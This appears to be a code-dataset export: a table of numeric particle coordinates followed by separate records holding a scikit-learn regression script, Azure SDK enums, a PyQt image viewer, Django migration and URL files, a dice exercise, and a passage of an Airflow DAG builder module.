1600 1 0.876891 0.685602 0.567467
1631 1 0.940018 0.754874 0.564231
1632 1 0.879106 0.814098 0.56508
1726 1 0.940999 0.687491 0.623961
1757 1 0.883496 0.749336 0.626381
1758 1 0.939541 0.812969 0.629241
692 1 0.500266 0.186378 0.688749
1629 1 0.874021 0.750915 0.506283
661 1 0.622158 0.00449964 0.619363
531 1 0.560233 1.00567 0.56513
1651 1 0.559258 0.879336 0.562622
1656 1 0.62419 0.942147 0.560284
1778 1 0.565557 0.938511 0.624277
1781 1 0.623855 0.874624 0.626736
1665 1 1.00748 0.498998 0.620336
1655 1 0.684187 0.875369 0.564893
1659 1 0.814426 0.871892 0.56137
1660 1 0.742218 0.940053 0.565675
1782 1 0.685652 0.941839 0.623132
1785 1 0.747062 0.869051 0.623618
1786 1 0.80971 0.930268 0.624084
1876 1 0.496342 0.816999 0.810411
543 1 0.932523 1.00281 0.557369
1908 1 0.499746 0.941596 0.811795
705 1 1.00212 0.251947 0.622211
669 1 0.871775 0.00361138 0.623722
1663 1 0.939148 0.874875 0.561579
1664 1 0.875997 0.93799 0.568577
1789 1 0.872542 0.874506 0.626179
1790 1 0.939192 0.932791 0.630551
1681 1 0.503629 0.497027 0.62483
1780 1 0.498765 0.934745 0.679071
804 1 0.997422 0.184158 0.813409
664 1 0.627271 0.0601409 0.685426
691 1 0.565941 0.128575 0.690841
786 1 0.559622 0.0658013 0.748491
792 1 0.627584 0.064903 0.813809
819 1 0.560589 0.125 0.808166
821 1 0.620769 0.130373 0.75405
1589 1 0.623839 0.626579 0.501788
1121 1 0.998939 0.875463 0.999492
533 1 0.618971 0.00292298 0.497034
668 1 0.742139 0.0584481 0.687584
695 1 0.682224 0.12257 0.694772
699 1 0.81052 0.121399 0.693913
790 1 0.689454 0.0626318 0.752552
794 1 0.811836 0.0634171 0.755254
796 1 0.747585 0.0624971 0.819465
823 1 0.688556 0.127147 0.816757
825 1 0.749392 0.122334 0.752643
827 1 0.811429 0.127344 0.813882
667 1 0.812364 1.00063 0.685275
795 1 0.816004 0.999431 0.818825
663 1 0.682667 0.99898 0.689761
2044 1 0.746812 0.941721 0.937823
672 1 0.871814 0.0624039 0.689467
703 1 0.936911 0.12361 0.68494
798 1 0.934803 0.0630345 0.752354
800 1 0.874098 0.0629309 0.807341
829 1 0.874331 0.127244 0.749442
831 1 0.934905 0.123984 0.809759
797 1 0.87674 -0.00247329 0.744326
799 1 0.936047 1.00162 0.813415
671 1 0.939969 0.999533 0.681244
2043 1 0.806757 0.876815 0.940463
562 1 0.56055 0.190649 0.499631
1905 1 0.503122 0.872178 0.74862
696 1 0.61906 0.189812 0.686182
723 1 0.563554 0.251978 0.683638
728 1 0.623487 0.311416 0.687015
818 1 0.565543 0.190244 0.753721
824 1 0.624495 0.186816 0.81336
850 1 0.563858 0.31271 0.748633
851 1 0.562415 0.251142 0.814918
853 1 0.624037 0.250433 0.747587
856 1 0.627397 0.314262 0.8071
1106 1 0.557646 0.816034 1.00007
537 1 0.747764 0.00397396 0.507671
881 1 0.501367 0.378589 0.752078
700 1 0.748854 0.181919 0.691497
727 1 0.688633 0.249179 0.684047
731 1 0.812315 0.245172 0.68564
732 1 0.750013 0.311632 0.688534
822 1 0.682909 0.18638 0.750714
826 1 0.812937 0.187746 0.74981
828 1 0.747349 0.189095 0.814274
854 1 0.684612 0.310711 0.747626
855 1 0.682596 0.254286 0.812538
857 1 0.743739 0.248992 0.752974
858 1 0.812493 0.312174 0.754229
859 1 0.813311 0.247397 0.815295
860 1 0.751907 0.30934 0.818567
2042 1 0.809775 0.931431 0.878068
704 1 0.875345 0.183001 0.685343
735 1 0.935888 0.249331 0.689062
736 1 0.874943 0.312578 0.686174
830 1 0.938798 0.184145 0.748192
832 1 0.877421 0.189836 0.810633
861 1 0.873203 0.251209 0.751017
862 1 0.933223 0.311169 0.753581
863 1 0.937261 0.246006 0.818539
864 1 0.875986 0.311697 0.817803
2041 1 0.753224 0.87313 0.880036
755 1 0.568413 0.377973 0.682617
760 1 0.630767 0.439139 0.679265
882 1 0.570177 0.437219 0.744051
883 1 0.570915 0.375776 0.808601
885 1 0.63012 0.375877 0.742863
888 1 0.633499 0.435155 0.809437
1683 1 0.558615 0.499968 0.687144
1813 1 0.621802 0.498097 0.74813
2039 1 0.693006 0.877149 0.937045
759 1 0.693425 0.370259 0.690498
763 1 0.812873 0.371135 0.683095
764 1 0.756854 0.437174 0.688998
886 1 0.692636 0.438108 0.749422
887 1 0.689366 0.368 0.809596
889 1 0.757108 0.376778 0.75229
890 1 0.816451 0.438146 0.758123
891 1 0.816428 0.374932 0.814084
892 1 0.749291 0.438011 0.815293
1691 1 0.817056 0.500862 0.685414
1687 1 0.693493 0.496023 0.684844
1815 1 0.688592 0.501278 0.806312
1601 1 0.998189 0.754268 0.502528
767 1 0.933847 0.369134 0.68879
768 1 0.871057 0.436601 0.688753
893 1 0.870529 0.378615 0.753002
894 1 0.943409 0.436824 0.743745
895 1 0.937449 0.373579 0.80945
896 1 0.874899 0.441281 0.81802
1823 1 0.942449 0.494705 0.81412
1695 1 0.938484 0.498794 0.68575
2038 1 0.691888 0.937276 0.873613
1811 1 0.559121 0.50428 0.817591
1688 1 0.62612 0.560816 0.694434
1715 1 0.564187 0.622806 0.687051
1810 1 0.562691 0.560746 0.7513
1816 1 0.627087 0.560966 0.810439
1843 1 0.559977 0.621766 0.814617
1845 1 0.623712 0.623612 0.751228
1729 1 1.00013 0.747548 0.630251
1819 1 0.81315 0.49982 0.818719
1817 1 0.758853 0.494661 0.754225
1692 1 0.752753 0.559629 0.688283
1719 1 0.687413 0.622474 0.688208
1723 1 0.813085 0.621628 0.688465
1814 1 0.692384 0.557774 0.747116
1818 1 0.812081 0.559051 0.752692
1820 1 0.753566 0.56161 0.815999
1847 1 0.685996 0.624265 0.814222
1849 1 0.751825 0.622149 0.751699
1851 1 0.806525 0.629769 0.814625
980 1 0.505173 0.309955 0.938578
1821 1 0.877986 0.496722 0.755167
1696 1 0.878416 0.561154 0.691421
1727 1 0.943979 0.623766 0.690566
1822 1 0.938179 0.557336 0.749561
1824 1 0.875555 0.557864 0.813673
1853 1 0.878844 0.620584 0.753113
1855 1 0.940516 0.621467 0.812577
1970 1 0.562234 0.683599 0.874746
2003 1 0.565206 0.751521 0.931953
919 1 0.684777 -0.000733749 0.937477
915 1 0.56012 0.00314353 0.938457
1720 1 0.620777 0.687804 0.685316
1747 1 0.560711 0.750954 0.685767
1752 1 0.623764 0.80684 0.686901
1842 1 0.564344 0.684536 0.75137
1848 1 0.620227 0.695391 0.818099
1874 1 0.562116 0.809047 0.747475
1875 1 0.557328 0.751046 0.808235
1877 1 0.626192 0.749637 0.750225
1880 1 0.621461 0.814826 0.807445
1657 1 0.748273 0.877904 0.506938
1724 1 0.74805 0.683513 0.69098
1751 1 0.687248 0.747585 0.685905
1755 1 0.809384 0.748575 0.687537
1756 1 0.750784 0.810564 0.684731
1846 1 0.680453 0.684082 0.747696
1850 1 0.810418 0.68499 0.752482
1852 1 0.74561 0.689966 0.80796
1878 1 0.689452 0.808681 0.751353
1879 1 0.686631 0.754991 0.816165
1881 1 0.748396 0.747956 0.751364
1882 1 0.811778 0.807653 0.749222
1883 1 0.807825 0.74864 0.815081
1884 1 0.750378 0.810323 0.814202
1873 1 0.497291 0.750275 0.748411
1728 1 0.876274 0.684836 0.688409
1759 1 0.940906 0.749516 0.687253
1760 1 0.872447 0.815215 0.685213
1854 1 0.939587 0.689197 0.7534
1856 1 0.873771 0.683549 0.818779
1885 1 0.875026 0.748425 0.744299
1886 1 0.93935 0.808856 0.749772
1887 1 0.940536 0.750408 0.805916
1888 1 0.875129 0.805023 0.810404
2035 1 0.556951 0.875988 0.935812
2005 1 0.625805 0.757625 0.872902
2034 1 0.559633 0.939547 0.881616
849 1 0.505127 0.250352 0.750096
787 1 0.558821 0.00642062 0.813555
789 1 0.622831 1.00284 0.751289
659 1 0.562421 0.00203701 0.68384
1779 1 0.561884 0.873383 0.688255
1784 1 0.622887 0.941366 0.686612
1906 1 0.55966 0.940337 0.744563
1907 1 0.565816 0.875564 0.817619
1909 1 0.622652 0.876514 0.748345
1912 1 0.617159 0.944797 0.813923
597 1 0.62102 0.252387 0.500119
791 1 0.688918 0.000783335 0.812899
793 1 0.750694 0.997785 0.747805
1783 1 0.686848 0.871823 0.684479
1787 1 0.811307 0.874835 0.685088
1788 1 0.748542 0.938221 0.682997
1910 1 0.691385 0.936201 0.755806
1911 1 0.688208 0.866743 0.81146
1913 1 0.751226 0.877366 0.749807
1914 1 0.811462 0.937178 0.748253
1915 1 0.812733 0.869273 0.814524
1916 1 0.757647 0.936847 0.811652
676 1 0.999854 0.182777 0.685994
1791 1 0.936226 0.870022 0.688916
1792 1 0.874802 0.940387 0.685478
1917 1 0.870605 0.870524 0.748474
1918 1 0.933182 0.937886 0.750115
1919 1 0.936879 0.874111 0.810951
1920 1 0.871283 0.933245 0.813103
2037 1 0.628068 0.879637 0.873067
569 1 0.743699 0.122476 0.501843
2040 1 0.621598 0.93978 0.937904
914 1 0.560943 0.0674181 0.878163
920 1 0.625091 0.0611309 0.939245
947 1 0.568297 0.128436 0.942293
949 1 0.622393 0.128463 0.877283
2002 1 0.563369 0.814542 0.875334
1604 1 0.99996 0.813945 0.563422
923 1 0.805848 0.0017076 0.938255
921 1 0.744716 1.00342 0.877845
918 1 0.684697 0.0644241 0.878342
922 1 0.814268 0.0646317 0.874942
924 1 0.749963 0.0645557 0.938535
951 1 0.688286 0.12416 0.944795
953 1 0.74636 0.128287 0.875295
955 1 0.810841 0.12852 0.94104
2008 1 0.629585 0.814612 0.940006
925 1 0.870467 1.00266 0.877614
927 1 0.937247 0.00326639 0.93371
926 1 0.939468 0.0634824 0.87061
928 1 0.87102 0.0642136 0.936497
957 1 0.875367 0.120898 0.87383
959 1 0.934677 0.120527 0.936538
1978 1 0.809506 0.682327 0.879261
724 1 0.503809 0.318288 0.689616
2007 1 0.683377 0.744481 0.939626
2012 1 0.747433 0.80837 0.938459
917 1 0.624562 0.00574954 0.874169
2011 1 0.81626 0.745914 0.935858
1974 1 0.685672 0.686945 0.87286
1732 1 1.003 0.811539 0.690171
981 1 0.629624 0.252615 0.877941
984 1 0.626765 0.316597 0.939235
946 1 0.566239 0.186211 0.876354
952 1 0.627737 0.186192 0.941404
978 1 0.570169 0.317655 0.873013
979 1 0.567208 0.252272 0.940322
2009 1 0.745983 0.746627 0.877851
753 1 0.501764 0.375525 0.624536
986 1 0.813331 0.3068 0.875724
982 1 0.687458 0.312745 0.875132
987 1 0.810207 0.24842 0.939045
988 1 0.749635 0.31242 0.937339
983 1 0.68818 0.24945 0.950164
954 1 0.809998 0.186491 0.876473
985 1 0.748975 0.252041 0.875545
956 1 0.748851 0.183594 0.941937
950 1 0.68887 0.187529 0.878488
1949 1 0.87815 0.497724 0.880476
960 1 0.876985 0.187249 0.940719
991 1 0.936117 0.250267 0.941917
990 1 0.939163 0.316104 0.871925
992 1 0.877545 0.312238 0.940899
989 1 0.87271 0.247128 0.882044
958 1 0.936924 0.183863 0.878661
2006 1 0.688937 0.808202 0.877927
1980 1 0.744133 0.686892 0.938205
1141 1 0.626704 0.876756 1.0024
1016 1 0.62572 0.437293 0.937641
1013 1 0.631051 0.371723 0.87399
1011 1 0.562207 0.376738 0.938612
1010 1 0.56888 0.439529 0.872285
1941 1 0.625402 0.500207 0.875065
2010 1 0.814097 0.807761 0.876261
1982 1 0.940689 0.684629 0.88008
1020 1 0.748326 0.437711 0.937416
1019 1 0.810363 0.371185 0.935978
1018 1 0.814029 0.439091 0.875558
1017 1 0.750213 0.374236 0.873206
1014 1 0.689296 0.44098 0.875965
1015 1 0.688852 0.376123 0.937827
1943 1 0.686868 0.501243 0.937859
2015 1 0.937968 0.749522 0.939175
1984 1 0.877805 0.680759 0.938687
1761 1 1.00206 0.875274 0.629442
1024 1 0.87215 0.437322 0.938089
1023 1 0.934393 0.370703 0.941714
1022 1 0.942514 0.435539 0.874602
1021 1 0.8746 0.375117 0.877044
1951 1 0.941059 0.498927 0.936765
1950 1 0.940629 0.560551 0.872508
1796 1 1.00021 0.560498 0.814115
1976 1 0.624748 0.679174 0.934401
2013 1 0.878327 0.746568 0.876442
1625 1 0.750481 0.755356 0.501492
1939 1 0.563477 0.498332 0.939609
1938 1 0.560713 0.563156 0.87779
1944 1 0.627556 0.559827 0.942673
1971 1 0.563215 0.626392 0.937767
1973 1 0.62268 0.625045 0.87347
2016 1 0.872151 0.813186 0.938218
2014 1 0.938355 0.812786 0.876374
1947 1 0.81307 0.499735 0.939189
1945 1 0.747324 0.497183 0.873345
1979 1 0.810351 0.622731 0.940126
1942 1 0.68228 0.564514 0.872138
1946 1 0.815006 0.563061 0.877181
1948 1 0.747778 0.559284 0.941944
1975 1 0.685148 0.620222 0.937031
1977 1 0.751177 0.624491 0.874837
1983 1 0.938361 0.617133 0.936982
1981 1 0.879137 0.620079 0.874074
1952 1 0.874636 0.562907 0.93847
737 1 0.997941 0.373913 0.621445
1117 1 0.879044 0.744647 1.00546
1012 1 0.503286 0.436653 0.935444
884 1 0.505884 0.434705 0.816171
1118 1 0.93839 0.809876 0.997263
1588 1 0.499899 0.688481 0.563406
977 1 0.505543 0.25315 0.876481
833 1 0.998674 0.251342 0.750867
756 1 0.502317 0.436516 0.688344
1937 1 0.502036 0.499138 0.877494
1661 1 0.877441 0.878671 0.500302
1586 1 0.566439 0.688273 0.496768
1809 1 0.505914 0.493486 0.752876
2020 1 1.0002 0.940374 0.935096
836 1 1.00101 0.311922 0.811263
1554 1 0.564346 0.562004 0.498796
852 1 0.506821 0.310508 0.808788
1074 1 0.563563 0.687265 1.00346
1540 1 0.998003 0.558044 0.558027
673 1 1.00738 0.124951 0.623239
740 1 1.00124 0.43656 0.682158
548 1 0.998463 0.185125 0.564347
1654 1 0.689232 0.939878 0.499937
1658 1 0.808957 0.938682 0.507323
1585 1 0.504732 0.628264 0.496457
1082 1 0.814379 0.684687 1.00247
21 1 0.61988 0.000150999 1.00165
1110 1 0.690073 0.809348 1.00194
118 1 0.688528 0.438766 0.996812
1146 1 0.8104 0.939979 1.00041
1114 1 0.816671 0.81506 1.00052
113 1 0.4993 0.371679 0.998608
125 1 0.87007 0.371168 1.0022
1650 1 0.558143 0.937179 0.504975
1150 1 0.94005 0.938008 0.996478
1617 1 0.501506 0.753439 0.504246
606 1 0.935426 0.313179 0.50003
633 1 0.744173 0.381078 0.49725
1590 1 0.683331 0.692264 0.502539
1557 1 0.623861 0.500824 0.50135
26 1 0.808787 0.068226 1.00226
1622 1 0.685959 0.813626 0.507248
1594 1 0.815898 0.692924 0.504871
33 1 0.998463 0.122122 0.998915
574 1 0.935994 0.188305 0.502992
1598 1 0.93674 0.691651 0.503403
1138 1 0.561145 0.937173 0.995046
1142 1 0.684473 0.937888 1.00198
| [
"[email protected]"
]
| |
8330dd686199cc1515e5595364a6d6fc22e245f6 | 5d9105fc2b36967ae99a09649021cdcaf71a72ed | /Project1_804587205_204617837_004589213_204587029/polynomial/plot_underfitting_overfitting.py | 349f38db338997e934f086c19f6c5724fb38a987 | []
| no_license | ishan793/EE239-Big-Data-Analysis | 2a9e0a126f9054798f67b233f2fc50c5f7380225 | 310080a39f111705b2271a9c61b61b3f5b33e91e | refs/heads/master | 2020-04-09T20:06:38.207491 | 2016-02-28T21:43:03 | 2016-02-28T21:43:03 | 50,261,455 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,557 | py | """
============================
Underfitting vs. Overfitting
============================
This example demonstrates the problems of underfitting and overfitting and
how we can use linear regression with polynomial features to approximate
nonlinear functions. The plot shows the function that we want to approximate,
which is a part of the cosine function. In addition, the samples from the
real function and the approximations of different models are displayed. The
models have polynomial features of different degrees. We can see that a
linear function (polynomial with degree 1) is not sufficient to fit the
training samples. This is called **underfitting**. A polynomial of degree 4
approximates the true function almost perfectly. However, for higher degrees
the model will **overfit** the training data, i.e. it learns the noise of the
training data.
We evaluate quantitatively **overfitting** / **underfitting** by using
cross-validation. We calculate the mean squared error (MSE) on the validation
set, the higher, the less likely the model generalizes correctly from the
training data.
"""
#print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn import cross_validation
import pickle
from sklearn.metrics import mean_squared_error
np.random.seed(0)
#data = pickle.load( open( "housing_data.pickle", "rb" ) )
data=pickle.load(open('network.pickle','rb'))
X=np.array(data['x'],dtype='float')
y=np.array(data['y'],dtype='float')
print X.shape
n_samples=X.shape[0]
y=np.reshape(y,(n_samples,1))
print y.shape
degrees = [1]
avg_score=[]
fixed_score=[]
X_test=X[0:50,:]
y_test=y[0:50,:]
X_train=X[51:,:]
y_train=y[51:,:]
#plt.figure(figsize=(14, 5))
'''for i in range(len(degrees)):
#ax = plt.subplot(1, len(degrees), i + 1)
#plt.setp(ax, xticks=(), yticks=())
polynomial_features = PolynomialFeatures(degree=degrees[i],interaction_only=True,
include_bias=False)
linear_regression = LinearRegression()
pipeline = Pipeline([("polynomial_features", polynomial_features),
("linear_regression", linear_regression)])
#pipeline.fit(X,y)
# Evaluate the models using crossvalidation
scores = cross_validation.cross_val_score(pipeline,
X, y, scoring="mean_squared_error", cv=10)
scores=np.average((abs(scores)**0.5))
avg_score.append(scores)
#plt.plot(X_test, true_fun(X_test), label="True function")
#plt.scatter(X, y, label="Samples")
#plt.xlabel("x")
#plt.ylabel("y")
#plt.xlim((0, 1))
#plt.ylim((-2, 2))
#plt.legend(loc="best")
#plt.title("Degree {}\nMSE = {:.2e}(+/- {:.2e})".format(
#degrees[i], -scores.mean(), scores.std()))
#plt.show()'''
'''print avg_score
plt.scatter(degrees,avg_score)
plt.show()'''
plt.figure(figsize=(14,5))
for i in range(len(degrees)):
ax=plt.subplot(1,len(degrees),i+1)
plt.setp(ax,xticks=(),yticks=())
poly=PolynomialFeatures(degree=degrees[i])
X_train_trans = poly.fit_transform(X_train)
X_test_trans = poly.fit_transform(X_test)
regr =LinearRegression()
regr.fit(X_train_trans,y_train)
y_pred = regr.predict(X_test_trans)
fixed_score.append((mean_squared_error(y_test,y_pred)**0.5))
#plt.plot(range(len(y_test)),(y_test-pipeline.predict(X_test)),range(len(y_test)),[0]*len(y_test))
print fixed_score
plt.scatter(degrees,fixed_score)
plt.show()
| [
"[email protected]"
]
| |
25b980a0be5f061c6bdc488b9c6e51969e8a81c7 | ceb5b7c3882b2bf3f53219356e914462c680f059 | /azure-mgmt-compute/azure/mgmt/compute/containerservice/v2017_01_31/models/container_service_client_enums.py | 279f5dcb9d3ff37bd26b6e9a9c88b555f28c3dff | [
"MIT"
]
| permissive | codalab/azure-sdk-for-python | b712da2a377cfa526e0ffa4fa40408e6a81e48e3 | f4c92d02d46fcdee9da430a18a394b108a2f8920 | refs/heads/master | 2021-01-19T14:40:23.567035 | 2017-04-11T22:49:13 | 2017-04-11T22:49:13 | 88,180,409 | 1 | 0 | null | 2017-04-13T15:36:45 | 2017-04-13T15:36:44 | null | UTF-8 | Python | false | false | 2,291 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerServiceOchestratorTypes(Enum):
swarm = "Swarm"
dcos = "DCOS"
custom = "Custom"
kubernetes = "Kubernetes"
class ContainerServiceVMSizeTypes(Enum):
standard_a0 = "Standard_A0"
standard_a1 = "Standard_A1"
standard_a2 = "Standard_A2"
standard_a3 = "Standard_A3"
standard_a4 = "Standard_A4"
standard_a5 = "Standard_A5"
standard_a6 = "Standard_A6"
standard_a7 = "Standard_A7"
standard_a8 = "Standard_A8"
standard_a9 = "Standard_A9"
standard_a10 = "Standard_A10"
standard_a11 = "Standard_A11"
standard_d1 = "Standard_D1"
standard_d2 = "Standard_D2"
standard_d3 = "Standard_D3"
standard_d4 = "Standard_D4"
standard_d11 = "Standard_D11"
standard_d12 = "Standard_D12"
standard_d13 = "Standard_D13"
standard_d14 = "Standard_D14"
standard_d1_v2 = "Standard_D1_v2"
standard_d2_v2 = "Standard_D2_v2"
standard_d3_v2 = "Standard_D3_v2"
standard_d4_v2 = "Standard_D4_v2"
standard_d5_v2 = "Standard_D5_v2"
standard_d11_v2 = "Standard_D11_v2"
standard_d12_v2 = "Standard_D12_v2"
standard_d13_v2 = "Standard_D13_v2"
standard_d14_v2 = "Standard_D14_v2"
standard_g1 = "Standard_G1"
standard_g2 = "Standard_G2"
standard_g3 = "Standard_G3"
standard_g4 = "Standard_G4"
standard_g5 = "Standard_G5"
standard_ds1 = "Standard_DS1"
standard_ds2 = "Standard_DS2"
standard_ds3 = "Standard_DS3"
standard_ds4 = "Standard_DS4"
standard_ds11 = "Standard_DS11"
standard_ds12 = "Standard_DS12"
standard_ds13 = "Standard_DS13"
standard_ds14 = "Standard_DS14"
standard_gs1 = "Standard_GS1"
standard_gs2 = "Standard_GS2"
standard_gs3 = "Standard_GS3"
standard_gs4 = "Standard_GS4"
standard_gs5 = "Standard_GS5"
| [
"[email protected]"
]
| |
447d86e8e9209462fd50b2b94da10ea4ce9f191d | 582cf2295d4b4666421da511507858435912ea30 | /Sample.py | 0a4cf81985e2de9af19913e6e31e192aa913f273 | []
| no_license | limjisooooooo/z | bfe71ba18fe186e02be5e7908d3068d86e9f63db | cf0dc6f3de63decd69ecd7f139740334807054bc | refs/heads/master | 2020-04-27T04:13:53.611372 | 2019-03-28T08:46:28 | 2019-03-28T08:46:28 | 174,047,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | import sys
import base64
from PyQt5.QtWidgets import *
#from PyQt5.QtGui import *
class Form(QMainWindow):
def __init__(self):
super().__init__()
self.browser = QTextBrowser(self)
self.browser.setGeometry(0, 0, 471, 401)
self.setGeometry(0, 0, 500, 500)
self.btnFile = QPushButton(self)
self.btnFile.setGeometry(2, 430, 25, 25)
self.btnFile.clicked.connect(self.fopen)
self.show()
self.setWindowTitle('Sample')
def fopen(self):
FileName, Filter = QFileDialog.getOpenFileUrl()
if FileName.path() != "":
f = open(FileName.path()[1:], 'rb')
data = base64.b64encode(f.read())
#print(data)
self.browser.append("<img src='data:image/jpeg;base64, " + data.decode() + "' alt='Image Can't Load'/>")
f.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Form()
sys.exit(app.exec()) | [
"[email protected]"
]
| |
d9b1642074ff790c14fedd3afa80bc618136166c | 2191d0e0d9fbec3dcef93386ba6c691d222bfed4 | /new_user/migrations/0015_auto_20170428_1826.py | 5aed1ff9f421cb90cdfeb799f1cda59759a131cd | []
| no_license | AnkitaVikramShetty/airbnbNewUserPredictions | 19e7a74bd39cc663c23e0a7c407d9a151a37a954 | 86338384d565fcd017f18944559165ee806b751f | refs/heads/master | 2021-01-19T04:40:59.235835 | 2017-05-02T16:14:55 | 2017-05-02T16:14:55 | 87,385,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('new_user', '0014_auto_20170428_1119'),
]
operations = [
migrations.AddField(
model_name='age_gender_bkts',
name='population_in_thousands',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='age_gender_bkts',
name='year',
field=models.FloatField(null=True),
),
]
| [
"[email protected]"
]
| |
3b30e4f81446dc8646720b7e1ef823a4cf0e1cba | e67822aa34c5d121978732b33a2bf85613b8fc41 | /chapter4/problem5.py | 2867d2e1eef48d0f06bdb66e7338affb6a062460 | []
| no_license | Kwon1995-2/BC_Python | c3a6cb450fbe728d368a840c03c0817e8dcc46fa | d3df813498a72367dc8f6a4f9efbbbca072de700 | refs/heads/master | 2023-03-18T21:39:45.621360 | 2021-03-20T13:50:39 | 2021-03-20T13:50:39 | 298,744,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | """ 크기가 같은 두개의 리스트 L, M을 생성하고
두 리스트의 각 요소 합으로 구성되는 새로운 리스트를
생성하라
L=[1,2,3] M=[4,5,6] => [5, 7, 9]"""
L = [1,2,3]
M = [4, 5, 6]
LM = []
for i in range(0,len(L)):
LM.insert(i, L[i]+M[i])
print(LM)
| [
"[email protected]"
]
| |
2ae5a8847cf48e47a874c90b02e69013112279ba | f9faa75c7a0608f5a03fde26fb494de9bfdaa895 | /WEEK 1/part01-e05_two_dice/src/two_dice.py | a650e13f6172340c085080170522dc497bc76781 | []
| no_license | LeguizamonLuciano/DataAnalysisHelsinkiUni | 16a8bead739b35a75f9d72c5691eedee70efc4eb | 84af79815a5bcd497f731c4c24a22bb569db0c7f | refs/heads/main | 2023-01-15T20:18:01.487593 | 2020-11-09T23:11:19 | 2020-11-09T23:11:19 | 307,580,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #!/usr/bin/env python3
def main():
for i in range(1,7):
for j in range(1,7):
if i+j == 5:
print((i,j))
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
d41c0a0dcfbff280e11e9fa43fbd1a64b889ce22 | 6444935a3e304e0d8f0fc4cf7fbb7153621cfc53 | /technosphere_python_backend/homeworks/06_07/project/project/urls.py | 6f1f921969039500acc29fa06730692f4e48846f | []
| no_license | SVasi1yev/other | d1032871dc36a22cc2b556d4cbf6c0dc0c968e87 | 1c31090e7b3e0ff04e00b4f5b0b7ac917fe83ed2 | refs/heads/master | 2023-08-04T16:28:05.163894 | 2023-07-17T14:32:09 | 2023-07-17T14:32:09 | 138,393,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
import sys
sys.path.append('..')
from forum import views
urlpatterns = [
path('admin/', admin.site.urls),
path('forum/', include('forum.urls')),
path('login/', views.login, name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('social_auth/', include('social_django.urls', namespace='social')),
path('', views.home, name='home')
]
| [
"[email protected]"
]
| |
c9a09e5b6cfdc643895b716f62e61cddeaf1f9ac | fe90bf63c34511ec9a4d7cb5a90957fbbb03a504 | /boundary_layer/builders/base.py | 06573b22f26400966c3a38fb8464d794b797405d | [
"Apache-2.0"
]
| permissive | etsy/boundary-layer | 778b115f94efc5d50986a289daf3ad265b38926c | c29594957c1fb47e308fcc89f7edcefc0797fc89 | refs/heads/master | 2023-07-21T17:03:15.769537 | 2023-01-04T14:05:53 | 2023-01-04T14:05:53 | 142,857,095 | 263 | 67 | Apache-2.0 | 2023-07-19T19:57:04 | 2018-07-30T09:51:52 | Python | UTF-8 | Python | false | false | 8,829 | py | # -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six.moves import filter
from jinja2 import Environment, PackageLoader
from boundary_layer.builders import util
from boundary_layer.logger import logger
from boundary_layer.registry import NodeTypes
from boundary_layer.util import sanitize_operator_name
from boundary_layer.containers import WorkflowMetadata
class DagBuilderBase(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def indent_operators(self):
pass
@abc.abstractmethod
def preamble(self):
pass
@abc.abstractmethod
def epilogue(self):
pass
@staticmethod
def _build_jinja_env():
jenv = Environment(
loader=PackageLoader('boundary_layer', 'builders/templates'),
trim_blocks=True)
jenv.filters['format_value'] = util.format_value
jenv.filters['add_leading_spaces'] = util.add_leading_spaces
jenv.filters['comment'] = util.comment
jenv.filters['sanitize_operator_name'] = sanitize_operator_name
jenv.filters['verbatim'] = util.verbatim
return jenv
def get_jinja_template(self, template_filename):
return self._build_jinja_env().get_template(template_filename)
def get_imports(self):
all_nodes = self.specs.graphs.primary.ordered() + \
[node for graph in self.specs.graphs.secondary
for node in graph.ordered()]
all_imports = [self.dag.get('imports', {})] + \
[node.imports() for node in all_nodes]
objects = {}
modules = set()
for node_imports in all_imports:
modules |= set(node_imports.get('modules', []))
for item in node_imports.get('objects', []):
objects.setdefault(item['module'], set())
objects[item['module']] |= set(item['objects'])
return {
'modules': modules,
'objects': objects,
}
def __init__(
self,
dag,
graph,
reference_path,
specs,
metadata=None,
referring_node=None,
sub_dag_builder=None,
generator_builder=None):
self.dag = dag
self.graph = graph
self.reference_path = reference_path
self.specs = specs
self.metadata = metadata or WorkflowMetadata(None, None)
self.referring_node = referring_node
self.sub_dag_builder = sub_dag_builder
self.generator_builder = generator_builder
@property
def default_task_args(self):
return self.specs.parsed.primary.get('default_task_args', {})
def build_dag_id(self):
return util.construct_dag_name(self.reference_path)
def render_operator(self, node):
template_filename = None
if node.type == NodeTypes.GENERATOR:
template_filename = 'generator_operator.j2'
elif node.type == NodeTypes.SUBDAG:
